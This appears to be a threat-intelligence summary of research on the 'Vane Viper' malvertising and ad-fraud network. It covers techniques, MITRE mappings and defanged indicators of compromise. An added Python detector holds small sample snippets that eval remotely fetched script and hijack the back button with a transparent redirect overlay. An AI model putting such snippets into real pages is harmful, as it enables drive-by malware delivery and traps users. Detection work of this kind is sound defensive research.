Deniability by Design: DNS-Driven Insights into a Malicious Ad Network

Vane Viper — an adtech ecosystem centered on AdTech Holding and PropellerAds — operates a large, resilient malvertising and ad-fraud network using traffic distribution systems (TDS), push-notification abuse, service-worker script chaining, and thousands of short-lived domains to deliver malware, fraudulent downloads, and persistent unwanted notifications. Investigation links Vane Viper infrastructure to PropellerAds, URL Solutions/Pananames, Webzilla/XBT, and related actors, showing shared IP space, registrar bulk registrations, and organizational ties that enable plausible deniability and large-scale abuse. #VaneViper #PropellerAds

Key Points

  • Vane Viper (AdTech Holding/PropellerAds) has appeared in ~50% of observed customer networks and produced ~1 trillion DNS queries in a year, leveraging ~60,000 known domains.
  • Evidence indicates PropellerAds-operated infrastructure (TDS and specific /24 address space) served as an origin for multiple malvertising and ad-fraud campaigns, though direct personnel direction was not independently proven.
  • Operator techniques include abusing push notifications via malicious service workers, script chaining with eval(), cloaking, geofencing, anti-adblock toggles, and dynamic redirects to funnel victims to malware, fake downloads, and scams.
  • Corporate and infrastructure links tie PropellerAds and AdTech Holding to URL Solutions/Pananames (registrar), Webzilla/XBT (hosting/ASN overlap), and associated executives, revealing opaque ownership and bulk domain registration behavior that aids evasion.
  • Specific campaigns delivered Android Triada trojans, malicious APKs, browser trojans (Browserknock/knock function), fake software download pages (Opera impersonation), forced push-subscription gates, and delivery of malicious browser extensions and survey/scam pages.
  • Registrar URL Solutions ranks highly in bulk domain registrations; Vane Viper accounts for nearly half of URL Solutions’ bulk events since Jan 2023, showing systematic mass registration to sustain domain churn and resilience to takedowns.
  • Historical context ties XBT/Webzilla address space to prior large-scale fraud and disinformation (Methbot, Doppelgänger, piracy sites), strengthening the pattern of repeated abuse across the shared ecosystem.

MITRE Techniques

  • [T1222] File and Directory Permissions Modification – Service workers and push notification scripts modify client-side behaviors and persist via browser-based permissions; quoted behavior: ‘…service workers and script chaining to abuse push notifications…’
  • [T1059] Command and Scripting Interpreter – Use of eval() in service workers to execute remote code in page context: ‘…A service worker’s use of “eval()” to execute any content fetched from a remote URL…’
  • [T1189] Drive-by Compromise – TDS-driven redirects and cloaking deliver malware and APKs to victims without explicit safe interaction: ‘…TDSs can route users to a virtually unlimited number of downstream landing pages…’
  • [T1204] User Execution – Push notification permission prompts and click-anywhere overlays coercing users to accept or click: ‘…page forcing the user to accept push notifications… a full-screen transparent tag overlays the page, ensuring any user click redirects to a payload URL.’
  • [T1608] Stage Capabilities – Use of persistent push notifications and service workers to maintain long-term access and repeated delivery of malicious content: ‘…These push notifications… grant persistence on an endpoint if they’re accepted by the user…’
  • [T1071] Application Layer Protocol – JSON-based TDS C2 files guiding redirect behavior and campaign toggles delivered over HTTP(S): ‘…the TDS command-and-control (C2) server returns a JSON file that guides further behavior…’
  • [T1566] Phishing – Fake software download pages (Opera impersonation) and survey scams used to trick users into installing malware or unwanted software: ‘…landing page masquerades as a download step… Every call to action links to ninoglostoay[.]com…’
  • [T1490] Inhibit System Recovery – Browser history poisoning and back-button hijacking to prevent easy exit from malicious pages: ‘…the page poisons the browser history and hijacks the back button, preventing users from leaving the page…’
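As an added example (not code from the Infoblox report or from the actors described), a small static triage script in Python that flags JavaScript showing the behaviours quoted in the technique list above: eval() of remotely fetched content, history stuffing that hijacks the back button, and a transparent full-screen element that redirects on click. Rule weights, the 5-point threshold and the sample fragments are constructed assumptions, not values from the page.

```python
import re

# Each rule: name, pattern, weight.  Weights are this example's assumption.
RULES = [
    # eval() applied to the body of a fetch() response (the T1059 behaviour)
    ("eval_of_fetched_content",
     re.compile(r"fetch\s*\(.{0,200}?\.text\(\).{0,80}?\beval\b", re.S), 5),
    # eval() wrapped directly around an awaited fetch()
    ("eval_await_fetch",
     re.compile(r"\beval\s*\(\s*await\b.{0,120}?\bfetch\s*\(", re.S), 5),
    # history.pushState inside a loop: history poisoning / back-button hijack (T1490)
    ("history_stuffing",
     re.compile(r"(?:for|while)\s*\(.{0,200}?history\.pushState", re.S), 3),
    # fixed, fully transparent element whose click handler sets location (T1204)
    ("transparent_click_overlay",
     re.compile(r"position\s*:\s*fixed.{0,300}?opacity\s*:\s*0\s*[;'\"}]"
                r".{0,300}?location(?:\.href)?\s*=", re.S), 3),
]
WEIGHTS = {name: w for name, _, w in RULES}


def scan_script(src: str) -> dict:
    """Return matched rule names, a summed score and a verdict for one script."""
    hits = [name for name, pat, _ in RULES if pat.search(src)]
    # Repeated pushState calls outside a loop also count as history stuffing
    if src.count("history.pushState") >= 3 and "history_stuffing" not in hits:
        hits.append("history_stuffing")
    score = sum(WEIGHTS[h] for h in hits)
    return {"hits": hits, "score": score, "suspicious": score >= 5}


# Constructed samples (not taken from any real campaign).
SUSPICIOUS_SW = """
self.addEventListener('push', function (e) {
  fetch('https://example.invalid/p.js').then(r => r.text()).then(eval);
});
"""
SUSPICIOUS_PAGE = """
for (var i = 0; i < 50; i++) { history.pushState({}, '', '#' + i); }
var d = document.createElement('div');
d.style.cssText = 'position:fixed;top:0;left:0;width:100%;height:100%;opacity:0;';
d.onclick = function () { location.href = PAYLOAD_URL; };
"""
BENIGN_SW = """
self.addEventListener('fetch', function (e) {
  e.respondWith(caches.match(e.request).then(r => r || fetch(e.request)));
});
"""
```

The benign cache-first service worker scores zero, which is the point of the `.text()` requirement: a service worker that only proxies `fetch(event.request)` must not trip the eval rule.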

Indicators of Compromise

  • [Domain] Malicious campaign infrastructure and push services – visionedmisfocusedpanfry[.]com (Triada APK drop), in-page-push[.]com, inpagepush[.]com
  • [Domain] Persistent push/monitoring domains linked to Vane Viper – omnatuor[.]com, propeller-tracking[.]com
  • [IP Address] Hosting/ASN and tenant mapping – 188.42.160.55 (landingpane[.]com hosted here; /24 assigned to PropellerAds via Webzilla AS), and 188.42.160.0/24 (PropellerAds assigned block)
  • [Malware/File] Malware samples and labels – Triada malicious APK (VirusTotal sample referenced), Browserknock-labeled file (VirusTotal entry referencing knock function)
  • [Registrar/Bulk registration] Registrar tied to mass domain churn – URL Solutions / Pananames bulk registration events (Vane Viper accounts for nearly half of URL Solutions bulk events since Jan 2023)


Read more: https://blogs.infoblox.com/threat-intelligence/deniability-by-design-dns-driven-insights-into-a-malicious-ad-network/